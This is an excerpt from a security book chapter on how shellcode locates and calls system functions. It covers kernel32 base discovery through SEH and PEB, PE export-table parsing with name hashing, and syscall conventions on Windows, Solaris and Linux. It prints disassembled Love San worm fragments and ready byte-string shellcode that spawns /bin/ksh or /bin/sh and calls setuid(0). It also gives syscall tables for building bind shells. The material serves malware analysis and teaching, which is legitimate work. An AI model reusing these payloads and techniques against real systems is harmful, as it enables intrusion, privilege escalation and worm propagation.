Technique of Calling System Functions

The ability to call system functions directly is not a mandatory condition of a successful attack, because the vulnerable program already contains everything the attack requires, including calls to the system functions and the high-level wrappers of the application libraries. Having disassembled the application under investigation and determined the addresses of the required functions, it is possible to use any of the following constructs: call target address; push return address/jmp relative address; or mov register, absolute target address/push return address/jmp register.

The attacker's position is favorable if the vulnerable program imports the LoadLibrary and GetProcAddress functions, because the shellcode will then be able to load any DLL and call any of its functions. What if there is no GetProcAddress in the import table? In this case, the attacker has to determine the addresses of the required functions independently, starting from the base load address returned by LoadLibrary and either parsing the Portable Executable (PE) file manually or identifying the functions by their signatures. The first approach is complicated, and the second one is unreliable. Relying on fixed addresses of the system functions is not acceptable, because they depend on the version of the operating system.

What could be done if the LoadLibrary function is missing from the import table, along with one or more system functions that the shellcode needs for propagation? In UNIX systems, it is possible to call the kernel functions directly, either through the interrupt at the 80h vector (in Linux, where parameters are passed through the registers, and in FreeBSD, where they are passed through the stack) or by the far call to the 0007h:00000000h address (in System V, where parameters are passed through the stack). This approach is the best. The numbers of the system calls are contained in the /usr/include/sys/syscall.h file (see also the section "Implementing System Calls in Different Operating Systems"). Also, recall the syscall and sysenter machine commands, which, as their self-explanatory names suggest, carry out direct system calls, along with passing parameters.

In Windows NT-like operating systems, the situation is more difficult. All interaction with the kernel is carried out through the int 2Eh interrupt, an interface unofficially called the native API. Some information on this topic can be found in the legendary "Interrupt List" by Ralf Brown ( http://www.cfyme.com/rbrown.htm ) and Windows NT/2000 Native API Reference by Gary Nebbett; however, this information is not enough. The interface is extremely sparingly documented, and for now the only way to get information about it is to analyze the disassembled listings of kernel32.dll and ntdll.dll. Working with the native API requires a high level of professional skill and detailed knowledge of the operating system architecture.

The Windows NT kernel operates with a small number of low-level functions. These functions are not suitable for direct use and, like any "semi-product," must be prepared as appropriate. For example, the LoadLibrary function is "split" into at least two system calls: NtCreateFile (EAX == 17h) opens a file, and NtCreateSection (EAX == 2Bh) maps that file into memory (in other words, it works like the CreateFileMapping function), after which NtClose (EAX == 0Fh) closes the descriptor. The GetProcAddress function is implemented entirely within ntdll.dll, and there is no trace of it in the kernel. Nevertheless, the PE specification is included in the Platform SDK and MSDN, so with the specification at hand, the export table can be analyzed manually.

On the other hand, there is no need to access the kernel to build an "emulator" of the LoadLibrary function, because the ntdll.dll and kernel32.dll libraries are always present in the address space of any process. Thus, if the hacker determines the addresses at which they are loaded, the goal is achieved. I know two methods of solving this problem: using the system structured exception handler and using the Process Environment Block (PEB). The first approach is self-evident but bulky and inelegant. The second approach is elegant but unreliable. However, the latter circumstance didn't prevent the Love San worm from propagating itself over millions of machines.

If an exception arises in the course of application execution (such as division by zero or access to a nonexistent memory page) and the application doesn't handle this situation on its own, then the system handler takes control. The system handler is usually implemented within kernel32.dll. In Windows 2000 Service Pack 3, this handler is located at the 77EA1856h address. This address depends on the version of the operating system; therefore, expertly designed shellcode must determine the handler address automatically. There is no need to cause an exception and trace the code, as was usual in the time of good old MS-DOS. It is much better to investigate the chain of structured exception handlers, each described by an EXCEPTION_REGISTRATION structure. The first double word of each such structure contains the pointer to the next structure in the chain (or the FFFFFFFFh value if there are no more handlers), and the second double word contains the address of the current handler (Listing 10.6).

Listing 10.6: The _EXCEPTION_REGISTRATION structure

    _EXCEPTION_REGISTRATION struc
            prev    dd ?
            handler dd ?
    _EXCEPTION_REGISTRATION ends
 

The first element of the chain of handlers is stored at the FS:[00000000h] address, and all the further ones reside directly in the address space of the process being investigated. Moving from element to element, it is possible to view all handlers until an element is encountered in which the prev field contains the FFFFFFFFh value. The handler field of that last element contains the address of the system handler. Unofficially, this mechanism is called "unwinding the structured exceptions stack." For more information on this topic, read "A Crash Course on the Depths of Win32 Structured Exception Handling" by Matt Pietrek (it is included in MSDN, see http://msdn.microsoft.com/msdnmag/issues/03/06/WindowsServer2003/default.aspx ).

Listing 10.7 provides an illustration of this mechanism. When the loop in this example terminates, the address of the system handler is in the EBX register (EAX holds the FFFFFFFFh end-of-chain marker).

Listing 10.7: Determining the base load address of kernel32.dll using SEH

    .data:00501007    XOR EAX, EAX          ; EAX := 0
    .data:00501009    XOR EBX, EBX          ; EBX := 0
    .data:0050100B    MOV ECX, fs:[EAX + 4] ; Handler address
    .data:0050100F    MOV EAX, fs:[EAX]     ; Pointer to the next handler
    .data:00501012    JMP short loc_501019  ; Check the loop condition.
    .data:00501014 ; ----------------------------------------------------
    .data:00501014 loc_501014:
    .data:00501014    MOV EBX, [EAX + 4]    ; Handler address
    .data:00501017    MOV EAX, [EAX]        ; Pointer to the next handler
    .data:00501019
    .data:00501019 loc_501019:
    .data:00501019    CMP EAX, 0FFFFFFFFh   ; Is this the last handler?
    .data:0050101C    JNZ short loc_501014  ; Loop until the loop
                                            ; condition is satisfied.
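The chain walk in Listing 10.7 can be modeled outside a live process. The following Python sketch is only an illustration under stated assumptions: the "address space" is an ordinary byte buffer, and the record addresses and handler values in `build_demo_memory` are made up for the demonstration. It shows the same logic of following `prev` pointers until the FFFFFFFFh marker and remembering the last `handler` seen.

```python
import struct

END_OF_CHAIN = 0xFFFFFFFF  # value of prev in the final registration record


def read_dword(memory: bytes, address: int) -> int:
    """Read a little-endian 32-bit value from the simulated address space."""
    return struct.unpack_from("<I", memory, address)[0]


def last_handler(memory: bytes, first_record: int) -> int:
    """Follow the prev pointers and return the handler of the final record.

    Each record is laid out as in Listing 10.6: prev at +0, handler at +4.
    Returns 0 if the chain is empty (first_record is already END_OF_CHAIN).
    """
    handler = 0
    record = first_record
    while record != END_OF_CHAIN:
        handler = read_dword(memory, record + 4)  # handler of this record
        record = read_dword(memory, record)       # move to the next record
    return handler


def build_demo_memory() -> bytes:
    """Hypothetical three-record chain at offsets 10h, 20h, and 30h."""
    memory = bytearray(0x40)
    struct.pack_into("<II", memory, 0x10, 0x20, 0x00401000)
    struct.pack_into("<II", memory, 0x20, 0x30, 0x00402000)
    struct.pack_into("<II", memory, 0x30, END_OF_CHAIN, 0x77EA1856)
    return bytes(memory)


if __name__ == "__main__":
    print(hex(last_handler(build_demo_memory(), 0x10)))
```

The result comes from the record whose `prev` field holds the end marker, which matches the register that Listing 10.7 fills inside its loop.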
 

If the hacker knows at least one address belonging to kernel32.dll, it is not difficult to determine its base load address: it is a multiple of 10000h (64 KB), and the memory there begins with the executable header, which is easily recognized by the MZ and PE signatures. The code provided in Listing 10.8 accepts the address of the system handler in the EBP register and returns the load address of kernel32.dll in the same register.

Listing 10.8: Determining the base load address by searching the main memory for MZ and PE signatures

    001B:0044676C   CMP     WORD PTR [EBP + 00], 5A4D       ; Is this MZ?
    001B:00446772   JNZ     00446781                        ; No, it isn't.
    001B:00446774   MOV     EAX, [EBP + 3C]                 ; To PE header
    001B:00446777   CMP     DWORD PTR [EAX + EBP + 0], 4550 ; Is this PE?
    001B:0044677F   JZ      00446789                        ; Yes, it is.
    001B:00446781   SUB     EBP, 00010000                   ; Previous 64 KB block
    001B:00446787   LOOP    0044676C                        ; Loop
    001B:00446789   ...
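The signature search in Listing 10.8 is the same check that analysis tools apply to memory dumps. The sketch below is a rough Python model of it, assuming the dump is a flat byte buffer indexed from zero; the function name `find_image_base` and the `max_steps` limit are illustrative choices, not part of the original code.

```python
import struct

STEP = 0x10000  # 64 KB, the step used by SUB EBP, 00010000 in Listing 10.8


def find_image_base(memory: bytes, address: int, max_steps: int = 64):
    """Scan downward from `address` in 64 KB steps for an MZ/PE header pair.

    Returns the offset of the image base inside `memory`, or None if no
    header is found within max_steps blocks.
    """
    base = address & ~(STEP - 1)  # round down to a 64 KB boundary
    for _ in range(max_steps):
        if base < 0:
            break
        # The header must fit in the buffer before the 3Ch field is read.
        if base + 0x40 <= len(memory) and memory[base:base + 2] == b"MZ":
            (pe_offset,) = struct.unpack_from("<I", memory, base + 0x3C)
            pe = base + pe_offset
            if memory[pe:pe + 4] == b"PE\0\0":  # DWORD 00004550h
                return base
        base -= STEP
    return None
```

Rounding the starting address down first is an addition of this sketch; the listing appears to assume that EBP is already aligned when the loop begins.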
 

There is an even more elegant method of determining the base load address of the kernel32.dll library based on PEB, the pointer to which is contained in the double word located at the FS:[00000030h] address. The structure of the PEB is shown in Listing 10.9.

Listing 10.9: Implementing the PEB structure in Windows 2000/XP

    PEB STRUC
            PEB_InheritedAddressSpace    DB     ?
            PEB_ReadImageFileExecOptions DB     ?
            PEB_BeingDebugged            DB     ?
            PEB_SpareBool                DB     ?
            PEB_Mutant                   DD     ?
            PEB_ImageBaseAddress         DD     ?
            PEB_PebLdrData               DD     PEB_LDR_DATA PTR ?  ; +0Ch
            ...
            PEB_SessionId                DD     ?
    PEB ENDS
 

At the 0Ch offset, the PEB contains the pointer to the PEB_LDR_DATA structure, representing the list of loaded DLLs, listed according to the order of their initialization. The ntdll.dll library is the first to initialize, and kernel32.dll follows it. The PEB_LDR_DATA structure is shown in Listing 10.10.

Listing 10.10: Implementing the PEB_LDR_DATA structure under Windows 2000/XP

    PEB_LDR_DATA STRUC
            PEB_LDR_cbsize                  DD         ?        ; +00
            PEB_LDR_Flags                   DD         ?        ; +04
            PEB_LDR_Unknown8                DD         ?        ; +08
            PEB_LDR_InLoadOrderModuleList   LIST_ENTRY ?        ; +0Ch
            PEB_LDR_InMemoryOrderModuleList LIST_ENTRY ?        ; +14h
            PEB_LDR_InInitOrderModuleList   LIST_ENTRY ?        ; +1Ch
    PEB_LDR_DATA ENDS

    LIST_ENTRY STRUC
            LE_FORWARD          DD    *forward_in_the_list     ; +00h
            LE_BACKWARD         DD    *backward_in_the_list    ; +04h
            LE_IMAGE_BASE       DD    imagebase_of_ntdll.dll   ; +08h
            ...
            LE_IMAGE_TIME       DD    imagetimestamp           ; +44h
    LIST_ENTRY ENDS
 

In general, the idea consists of reading the double word at the FS:[00000030h] address, treating it as the pointer to the PEB, following the pointer located at the 0Ch offset to PEB_LDR_DATA, and taking the InInitOrderModuleList field at the 1Ch offset of that structure. Having discarded the first element, which belongs to ntdll.dll, it is possible to obtain the pointer to the LIST_ENTRY that contains the characteristics of kernel32.dll (in particular, the base load address is stored in the third double word). It is much easier to program this algorithm than to describe it. The preceding description easily fits within five Assembly commands.

Listing 10.11 shows a code fragment from the Love San worm, a dangerous threat to the Internet. This fragment was not written by the author of the worm. On the contrary, it was borrowed from third-party sources. This is indicated by the presence of "extra" Assembly commands intended for compatibility with Windows 9x (for which the situation is different from the one that exists in Windows NT). The natural habitat of the Love San worm is limited to Windows NT-like systems, and it is unable to infect Windows 9x systems.

Listing 10.11: Fragment of the Love San worm

    data:004046FE 64 A1 30 00 00    MOV  EAX, large fs:30h ; PEB base
    data:00404704 85 C0             TEST EAX, EAX          ;
    data:00404706 78 0C             JS   short loc_404714  ; Windows 9x
    data:00404708 8B 40 0C          MOV  EAX, [EAX + 0Ch]  ; PEB_LDR_DATA
    data:0040470B 8B 70 1C          MOV  ESI, [EAX + 1Ch]  ; The first element of
                                                           ; InInitOrderModuleList
    data:0040470E AD                LODSD                  ; Next element
    data:0040470F 8B 68 08          MOV  EBP, [EAX + 8]    ; Base address of
                                                           ; kernel32.dll
    data:00404712 EB 09             JMP  SHORT loc_40471D
    data:00404714 ; ------------------------------------------------------------
    data:00404714 loc_404714:                              ; CODE XREF: kk_get_kernel32 + A j
    data:00404714 8B 40 34          MOV  EAX, [EAX + 34h]
    data:00404717 8B A8 B8 00 00+   MOV  EBP, [EAX + 0B8h]
    data:00404717
    data:0040471D loc_40471D:                              ; CODE XREF: kk_get_kernel32 + 16 j
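The pointer chain that the Windows NT branch of Listing 10.11 follows can be traced on paper or, as in the following Python sketch, over a simulated memory buffer. Everything concrete here is an assumption made for illustration: the structure addresses (100h, 200h, 300h, 400h), the two image bases, and the helper names are invented, and the offsets are the Windows 2000/XP ones from Listings 10.9 and 10.10.

```python
import struct


def read_dword(memory: bytes, address: int) -> int:
    """Read a little-endian 32-bit value from the simulated address space."""
    return struct.unpack_from("<I", memory, address)[0]


def second_module_base(memory: bytes, peb: int) -> int:
    """Return the image base of the second module in initialization order."""
    ldr = read_dword(memory, peb + 0x0C)      # PEB -> PEB_LDR_DATA
    first = read_dword(memory, ldr + 0x1C)    # InInitOrderModuleList: 1st entry
    second = read_dword(memory, first)        # forward link: 2nd entry (LODSD)
    return read_dword(memory, second + 0x08)  # third double word: image base


def build_demo_memory() -> bytes:
    """Hypothetical layout: PEB at 100h, loader data at 200h, two entries."""
    memory = bytearray(0x500)
    struct.pack_into("<I", memory, 0x100 + 0x0C, 0x200)
    struct.pack_into("<I", memory, 0x200 + 0x1C, 0x300)
    struct.pack_into("<III", memory, 0x300, 0x400, 0x21C, 0x77F80000)  # 1st
    struct.pack_into("<III", memory, 0x400, 0x21C, 0x300, 0x77E80000)  # 2nd
    return bytes(memory)


if __name__ == "__main__":
    print(hex(second_module_base(build_demo_memory(), 0x100)))
```

The sketch returns whatever module happens to be second in the list. That this module is kernel32.dll is the ordering assumption the text describes, which is one reason the method is called unreliable.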
 

The code fragment in Listing 10.11 is responsible for determining the base load address of kernel32.dll, which makes the worm practically independent of the version of the attacked operating system.

Manual parsing of the PE format, however scary it sounds, can be implemented easily. The double word located at the 3Ch offset from the base load address contains the offset (not the pointer) of the PE file header. This header, in turn, contains the offset of the export table in the double word at the 78h offset. Within the export table, bytes 18h to 1Bh store the number of exported functions, and bytes 20h to 23h store the offset of the table of exported names (functions are actually exported by ordinals, and the offset of the ordinals table is located in bytes 24h to 27h). Memorize these values: 3Ch, 78h, and 20h/24h. They are frequently encountered when investigating the code of worms and exploits, so knowing them considerably simplifies identification of their algorithms. For example, the fragment of the Love San worm responsible for determining the address of the table of exported names is provided in Listing 10.12.

Listing 10.12: Love San worm fragment that determines the table of exported names address

    .data:00404728 MOV EBP, [ESP + arg_4]     ; Base load address of kernel32
    .data:0040472C MOV EAX, [EBP + 3Ch]       ; To PE header
    .data:0040472F MOV EDX, [EBP + EAX + 78h] ; To the export table
    .data:00404733 ADD EDX, EBP
    .data:00404735 MOV ECX, [EDX + 18h]       ; Number of exported functions
    .data:00404738 MOV EBX, [EDX + 20h]       ; To the table of exported names
    .data:0040473B ADD EBX, EBP               ; Address of the table
                                              ; of exported names
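The offsets 3Ch, 78h, 18h, and 20h are easiest to remember after reading them once from a real or synthetic image. The Python sketch below mirrors Listing 10.12 under two assumptions that should be stated loudly: the buffer holds a 32-bit (PE32) image as it is laid out in memory, so that every offset in the headers can be used directly as an index, and the function name `export_names_table` is invented for this example.

```python
import struct


def read_dword(image: bytes, offset: int) -> int:
    """Read a little-endian 32-bit value from the mapped image."""
    return struct.unpack_from("<I", image, offset)[0]


def export_names_table(image: bytes):
    """Return (number_of_names, offset_of_names_table) for a mapped PE32 image.

    Assumes a 32-bit image: in 64-bit (PE32+) files the export directory
    entry is not at 78h from the PE signature.
    """
    if image[:2] != b"MZ":
        raise ValueError("no MZ signature at the base address")
    pe_header = read_dword(image, 0x3C)             # offset of the PE header
    if image[pe_header:pe_header + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    export_table = read_dword(image, pe_header + 0x78)  # offset of export table
    count = read_dword(image, export_table + 0x18)      # number of names
    names = read_dword(image, export_table + 0x20)      # table of exported names
    return count, names
```

In the worm, each of these offsets is added to the base address in EBP; here the base is simply index zero of the buffer.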
 

Now, based on the address of the table of exported names (which, in a rough approximation, is an array of ASCIIZ text strings, each corresponding to an API function), it is possible to obtain all the required information. However, a character-by-character comparison is inefficient, and hackers often abandon it. First, the names of most API functions are too bulky, while the shellcode is strictly limited in size. Second, explicit loading of API functions by name considerably simplifies the analysis of the shellcode algorithms. The algorithm of hash comparison is free from these drawbacks. In general, it is reduced to the convolution of the compared strings by some function f. Detailed information about this algorithm can be found in specialized literature (for instance, see The Art of Computer Programming by Donald Knuth). Here, only the code, supplied with detailed comments, will be provided (Listing 10.13).

Listing 10.13: Love San worm fragment that determines the function index in the table

    .data:0040473D loc_40473D:              ; CODE XREF: kk_get_proc_adr + 36 j
    .data:0040473D JECXZ short loc_404771   ; Error
    .data:0040473F DEC   ECX                ; ECX holds the number of exported
                                            ; names not yet checked.
    .data:00404740 MOV   ESI, [EBX + ECX*4] ; Offset of the name with index ECX
                                            ; (scanning from the end of the array)
    .data:00404743 ADD   ESI, EBP           ; Address of that name
    .data:00404745 XOR   EDI, EDI           ; EDI := 0
    .data:00404747 CLD                      ; Reset the direction flag.
    .data:00404748
    .data:00404748 loc_404748:              ; CODE XREF: kk_get_proc_adr + 30 j
    .data:00404748 XOR   EAX, EAX           ; EAX := 0
    .data:0040474A LODSB                    ; Read the next character
                                            ; of the function name.
    .data:0040474B CMP   AL, AH             ; Is this the end of the string?
    .data:0040474D JZ    short loc_404756   ; If this is the end,
                                            ; then jump to the end.
    .data:0040474F ROR   EDI, 0Dh           ; Hash the function name
    .data:00404752 ADD   EDI, EAX           ; and accumulate the hash sum
                                            ; in the EDI register.
    .data:00404754 JMP   short loc_404748   ;
    .data:00404756 loc_404756:              ; CODE XREF: kk_get_proc_adr + 29 j
    .data:00404756 CMP   EDI, [ESP + arg_0] ; Is this the hash of the function?
    .data:0040475A JNZ   short loc_40473D   ; If no, continue testing.
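When analyzing code like Listing 10.13, it helps to recompute the hash offline and match the constants found in the binary against known export names. The Python sketch below assumes that the hashing step is a 13-bit right rotation of the accumulator followed by the addition of the next character, a rotate-and-add scheme common in shellcode of that period; the function names are chosen here for illustration.

```python
def rotate_right(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    value &= 0xFFFFFFFF
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def name_hash(name: bytes) -> int:
    """Rotate-and-add hash over the characters of an export name.

    The terminating zero is not hashed, matching the loop in the listing,
    which tests for the end of the string before updating the sum.
    """
    accumulator = 0
    for character in name:
        accumulator = (rotate_right(accumulator, 13) + character) & 0xFFFFFFFF
    return accumulator


if __name__ == "__main__":
    for export in (b"LoadLibraryA", b"GetProcAddress"):
        print(export.decode(), hex(name_hash(export)))
```

An analyst would typically run such a function over every name exported by kernel32.dll and build a reverse table from hash to name.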
 

Knowing the index of the target function in the table of exported names, it is easy to determine its address. For example, this can be done as shown in Listing 10.14.

Listing 10.14: Love San worm fragment that determines the actual address of an API function in the main memory

    .data:0040475C MOV EBX, [EDX + 24h]   ; Offset of the exported ordinals table
    .data:0040475F ADD EBX, EBP           ; Address of the ordinals table
    .data:00404761 MOV CX, [EBX + ECX*2]  ; Get the index within the ordinals table.
    .data:00404765 MOV EBX, [EDX + 1Ch]   ; Offset of the exported addresses table
    .data:00404768 ADD EBX, EBP           ; Address of the exported addresses table
    .data:0040476A MOV EAX, [EBX + ECX*4] ; Get the offset of the function by index.
    .data:0040476D ADD EAX, EBP           ; Get the function address.
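The three-table lookup in Listing 10.14 (names, then ordinals, then addresses) can be sketched in Python as follows. This is a minimal model, assuming a mapped 32-bit image in a byte buffer and an already known offset of the export table; for readability it compares names directly instead of hashes, and `resolve_export` is a hypothetical helper name.

```python
import struct


def read_dword(image: bytes, offset: int) -> int:
    return struct.unpack_from("<I", image, offset)[0]


def read_word(image: bytes, offset: int) -> int:
    return struct.unpack_from("<H", image, offset)[0]


def read_name(image: bytes, offset: int) -> bytes:
    """Read a zero-terminated ASCII string."""
    return image[offset:image.index(b"\0", offset)]


def resolve_export(image: bytes, export_table: int, wanted: bytes):
    """Return the offset of `wanted` from the image base, or None."""
    count = read_dword(image, export_table + 0x18)      # number of names
    addresses = read_dword(image, export_table + 0x1C)  # exported addresses
    names = read_dword(image, export_table + 0x20)      # exported names
    ordinals = read_dword(image, export_table + 0x24)   # exported ordinals
    for i in range(count):
        if read_name(image, read_dword(image, names + 4 * i)) == wanted:
            index = read_word(image, ordinals + 2 * i)     # 16-bit entries
            return read_dword(image, addresses + 4 * index)
    return None
```

The returned value is an offset; as in the last instruction of the listing, the base load address must be added to it to obtain the actual address.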
 

Implementing System Calls in Different Operating Systems

The mechanism of system calls belongs to the inner workings of the operating system, its internal "kitchen," which is not always well documented. The code of a worm is full of constants and commands that manipulate registers in intricate ways, yet the actual meaning of what is going on often remains unclear.

The family of UNIX-like operating systems overwhelms everyone with its variety, complicating the development of portable shellcode to the extreme. At least six methods of organizing the interface with the kernel are used, including the far call by selector 7 offset 0 (HP-UX/PA-RISC, Solaris/x86, xBSD/x86), syscall (IRIX/MIPS), ta 8 (Solaris/SPARC), svca (AIX/Power/PowerPC), INT 25h (BeOS/x86), and INT 80h (xBSD/x86, Linux/x86). The order of passing parameters and the numbers of the system calls are different for different operating systems. Some systems are listed twice, which means that they use hybrid mechanisms of system calls. It is impractical to describe every system in detail here, because doing so would take too much space. Furthermore, this information was long ago provided in "UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes" by the Last Stage of Delirium Research Group ( http://opensores.thebunker.net/pub/mirrors/blackhat/presentations/bh-usa-01/LSD/bh-usa-01-lsd.pdf ).

Yes! This is the same legendary hacker group that found a hole in Remote Procedure Call (RPC). They are real experts and excellent programmers. The preceding manual is highly recommended to code diggers in general and investigators of viruses and worms in particular.

Provided in Listing 10.15 is the fragment of the mworm lab worm, which I developed after reading their documentation. This worm demonstrates the technique of using system calls under xBSD/x86 (see also Fig. 10.1).

Figure 10.1: An example illustrating how system calls can be used for malicious purposes

Listing 10.15: Fragment of the mworm worm using remote shell under xBSD/x86

    data:0804F860 x86_fbsd_shell:
    data:0804F860 31 C0            XOR    EAX, EAX    ; EAX := 0
    data:0804F862 99               CDQ                ; EDX := 0
    data:0804F863 50               PUSH   EAX
    data:0804F864 50               PUSH   EAX
    data:0804F865 50               PUSH   EAX
    data:0804F866 B0 7E            MOV    AL, 7Eh
    data:0804F868 CD 80            INT    80h         ; LINUX - sys_sigprocmask
    data:0804F86A 52               PUSH   EDX         ; Terminating zero
    data:0804F86B 68 6E 2F 73 68   PUSH   68732F6Eh   ; ..n/sh
    data:0804F870 44               INC    ESP
    data:0804F871 68 2F 62 69 6E   PUSH   6E69622Fh   ; /bin/n..
    data:0804F876 89 E3            MOV    EBX, ESP
    data:0804F878 52               PUSH   EDX
    data:0804F879 89 E2            MOV    EDX, ESP
    data:0804F87B 53               PUSH   EBX
    data:0804F87C 89 E1            MOV    ECX, ESP
    data:0804F87E 52               PUSH   EDX
    data:0804F87F 51               PUSH   ECX
    data:0804F880 53               PUSH   EBX
    data:0804F881 53               PUSH   EBX
    data:0804F882 6A 3B            PUSH   3Bh
    data:0804F884 58               POP    EAX
    data:0804F885 CD 80            INT    80h         ; LINUX - sys_olduname
    data:0804F887 31 C0            XOR    EAX, EAX
    data:0804F889 FE C0            INC    AL
    data:0804F88B CD 80            INT    80h         ; LINUX - sys_exit
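The PUSH / INC ESP / PUSH sequence in Listing 10.15 is easier to follow when the stack bytes are written out. The following Python sketch simulates only those four steps on a tiny byte array; the `Stack` class is a hypothetical helper, not a model of a real CPU, and it assumes the little-endian byte order of x86.

```python
import struct


class Stack:
    """A minimal downward-growing stack of bytes, as on x86."""

    def __init__(self, size: int = 32):
        self.memory = bytearray(size)
        self.esp = size  # the stack is empty: ESP points past the end

    def push(self, value: int) -> None:
        """Store a 32-bit little-endian value below the current top."""
        self.esp -= 4
        struct.pack_into("<I", self.memory, self.esp, value)

    def string_at_esp(self) -> bytes:
        """Return the zero-terminated string that starts at ESP."""
        end = self.memory.index(0, self.esp)
        return bytes(self.memory[self.esp:end])


def build_path() -> bytes:
    stack = Stack()
    stack.push(0)           # PUSH EDX: terminating zero
    stack.push(0x68732F6E)  # bytes in memory: 'n', '/', 's', 'h'
    stack.esp += 1          # INC ESP: skip the leading 'n'
    stack.push(0x6E69622F)  # bytes in memory: '/', 'b', 'i', 'n'
    return stack.string_at_esp()


if __name__ == "__main__":
    print(build_path())
```

The extra 'n' in the first constant is padding: it lets a four-byte push carry the three-character tail of the path without a zero byte in the instruction stream, and the second push overwrites it with the final 'n' of "/bin".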
 

Solaris/SPARC

The system call is carried out using the trap raised by the ta 8 machine command. The number of the system call is passed using the %g1 register, and arguments are passed using the %o0, %o1, %o2, %o3, and %o4 registers. The list of numbers of the most widely used system functions is provided in Listing 10.16. Listing 10.17 provides an example of shellcode demonstrating the use of system calls under Solaris/SPARC.

Listing 10.16: Numbers of system calls in Solaris/SPARC

    Syscall    %g1   %o0, %o1, %o2, %o3, %o4
    Exec       00Bh  path = "/bin/ksh", [a0 = path, 0]
    Exec       00Bh  path = "/bin/ksh", [a0 = path, a1 = "-c", a2 = cmd, 0]
    Setuid     017h  uid = 0
    Mkdir      050h  path = "b..", mode = (each value is valid)
    Chroot     03Dh  path = "b..", "."
    Chdir      00Ch  path = ".."
    Ioctl      036h  sfd, TI_GETPEERNAME = 5491h, [mlen = 54h, len = 54h, sadr = []]
    so_socket  0E6h  AF_INET = 2, SOCK_STREAM = 2, prot = 0, devpath = 0, SOV_DEFAULT = 1
    bind       0E8h  sfd, sadr = [33h, 2, hi, lo, 0, 0, 0, 0], len = 10h, SOV_SOCKSTREAM = 2
    listen     0E9h  sfd, backlog = 5, vers = (not required in this syscall)
    accept     0EAh  sfd, 0, 0, vers = (not required in this syscall)
    fcntl      03Eh  sfd, F_DUP2FD = 09h, fd = 0, 1, 2
 
Listing 10.17: An example illustrating shellcode under Solaris/SPARC

    char shellcode[]=      /* 10*4+8 bytes */
    "\x20\xbf\xff\xff"     /* bn,a <shellcode-4>  ; \                            */
    "\x20\xbf\xff\xff"     /* bn,a <shellcode>    ; +- the current command       */
                           /*                     ;    pointer in %o7            */
    "\x7f\xff\xff\xff"     /* call <shellcode+4>  ; /                            */
    "\x90\x03\xe0\x20"     /* add %o7,32,%o0      ; %o0 contains the pointer     */
                           /*                     ; to /bin/ksh.                 */
    "\x92\x02\x20\x10"     /* add %o0,16,%o1      ; %o1 contains the pointer     */
                           /*                     ; to free memory.              */
    "\xc0\x22\x20\x08"     /* st %g0,[%o0+8]      ; Place terminating zero       */
                           /*                     ; into /bin/ksh.               */
    "\xd0\x22\x20\x10"     /* st %o0,[%o0+16]     ; Store the path pointer (a0)  */
                           /*                     ; at the %o1 pointer.          */
    "\xc0\x22\x20\x14"     /* st %g0,[%o0+20]     ; Terminate the argument array */
                           /*                     ; with zero.                   */
    "\x82\x10\x20\x0b"     /* mov 0x0b,%g1        ; Number of the exec           */
                           /*                     ; system function              */
    "\x91\xd0\x20\x08"     /* ta 8                ; Call the exec function.      */
    "/bin/ksh";
 

Solaris/x86

The system call is carried out using the far call gateway at the 0007:00000000 address (selector 7 offset 0). The number of the system call is passed using the EAX register, and arguments are passed through the stack, the leftmost argument being the last to be pushed onto the stack. The function being called must clear the stack on its own. The list of numbers of the most widely used system functions is provided in Listing 10.18. Listing 10.19 provides an example of shellcode demonstrating the use of system calls under Solaris/x86.

Listing 10.18: Numbers of system calls under Solaris/x86

    syscall    %eax  stack
    exec       0Bh   RET, path = "/bin/ksh", [a0 = path, 0]
    exec       0Bh   RET, path = "/bin/ksh", [a0 = path, a1 = "-c", a2 = cmd, 0]
    setuid     17h   RET, uid = 0
    mkdir      50h   RET, path = "b..", mode = (each value is valid)
    chroot     3Dh   RET, path = "b..", "."
    chdir      0Ch   RET, path = ".."
    ioctl      36h   RET, sfd, TI_GETPEERNAME = 5491h, [mlen = 91h, len = 91h, adr = []]
    so_socket  E6h   RET, AF_INET = 2, SOCK_STREAM = 2, prot = 0, devpath = 0, SOV_DEFAULT = 1
    bind       E8h   RET, sfd, sadr = [FFh, 2, hi, lo, 0, 0, 0, 0], len = 10h, SOV_SOCKSTREAM = 2
    listen     E9h   RET, sfd, backlog = 5, vers = (not required in this syscall)
    accept     EAh   RET, sfd, 0, 0, vers = (not required in this syscall)
    fcntl      3Eh   RET, sfd, F_DUP2FD = 09h, fd = 0, 1, 2
 
Listing 10.19: An example of shellcode under Solaris/x86

    char setuidcode[]=   /* 7 bytes */
    "\x33\xc0"           /* XORL %EAX, %EAX  ; EAX := 0                       */
    "\x50"               /* PUSHL %EAX       ; Push zero into the stack.      */
    "\xb0\x17"           /* MOVB $0x17, %AL  ; Setuid system function number  */
    "\xff\xd6";          /* CALL *%ESI       ; setuid(0)                      */
 

Linux/x86

The system call is carried out through a software interrupt at vector 80h, raised by the int 80h machine instruction. The number of the system call is passed through the EAX register, and arguments are passed through the EBX, ECX, and EDX registers. The list of numbers of the most widely used system functions is provided in Listing 10.20. Listing 10.21 provides an example of shellcode demonstrating the use of system calls under Linux/x86.

Listing 10.20: Numbers of system calls under Linux/x86

    Syscall     %EAX  %EBX, %ECX, %EDX
    exec        0Bh   path = "/bin//sh", [a0 = path, 0]
    exec        0Bh   path = "/bin//sh", [a0 = path, a1 = "-c", a2 = cmd, 0]
    setuid      17h   uid = 0
    mkdir       27h   path = "b..", mode = 0 (each value is valid)
    chroot      3Dh   path = "b..", "."
    chdir       0Ch   path = ".."
    socketcall  66h   getpeername = 7, [sfd, sadr = [], [len = 10h]]
    socketcall  66h   socket = 1, [AF_INET = 2, SOCK_STREAM = 1, prot = 0]
    socketcall  66h   bind = 2, [sfd, sadr = [FFh, 2, hi, lo, 0, 0, 0, 0], len = 10h]
    socketcall  66h   listen = 4, [sfd, backlog = 102]
    socketcall  66h   accept = 5, [sfd, 0, 0]
    dup2        3Fh   sfd, fd = 2, 1, 0
 
Listing 10.21: An example of shellcode under Linux/x86

    char setuidcode[]=   /* 8 bytes */
    "\x33\xc0"           /* XORL %EAX, %EAX  ; EAX := 0                            */
    "\x31\xdb"           /* XORL %EBX, %EBX  ; EBX := 0                            */
    "\xb0\x17"           /* MOVB $0x17, %AL  ; Number of the setuid system function */
    "\xcd\x80";          /* INT $0x80        ; setuid(0)                           */
 

FreeBSD, NetBSD, and OpenBSD for the x86 Platform

